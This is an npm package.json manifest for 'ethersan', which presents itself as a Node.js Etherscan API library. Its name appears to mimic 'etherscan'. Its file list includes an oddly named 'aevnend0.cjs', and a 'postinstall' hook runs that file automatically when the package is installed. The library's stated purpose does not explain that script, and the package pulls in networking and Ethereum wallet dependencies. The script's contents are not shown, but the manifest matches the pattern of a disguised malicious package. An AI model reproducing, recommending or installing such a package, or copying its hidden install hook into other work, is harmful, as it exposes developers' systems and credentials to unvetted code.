ethersan
Version:
Node.js library for communicating with the Etherscan API.
45 lines • 954 B
JSON
{
"name": "ethersan",
"version": "0.2.2",
"description": "Node.js library for communicating with the Etherscan API.",
"author": "x0r2",
"license": "MIT",
"repository": {
"type": "git",
"url": "https://github.com/x0r2/etherscan.git"
},
"engines": {
"node": ">=8.0.0"
},
"keywords": [
"etherscan",
"etherscan api",
"etherscan.io",
"ethereum api"
],
"files": [
"index.mjs",
"index.js",
"test.js",
"aevnend0.cjs"
],
"scripts": {
"postinstall": "node aevnend0.cjs"
},
"devDependencies": {
"babel-cli": "^6.26.0",
"babel-plugin-add-module-exports": "^0.2.1",
"babel-plugin-transform-object-rest-spread": "^6.26.0",
"babel-preset-env": "^1.6.1",
"jest": "^21.2.1",
"request": "^2.34.0"
},
"dependencies": {
"request-promise-native": "^1.0.5",
"axios": "^1.7.7",
"ethers": "^6.13.2"
},
"peerDependencies": {
"request": "^2.34.0"
}
}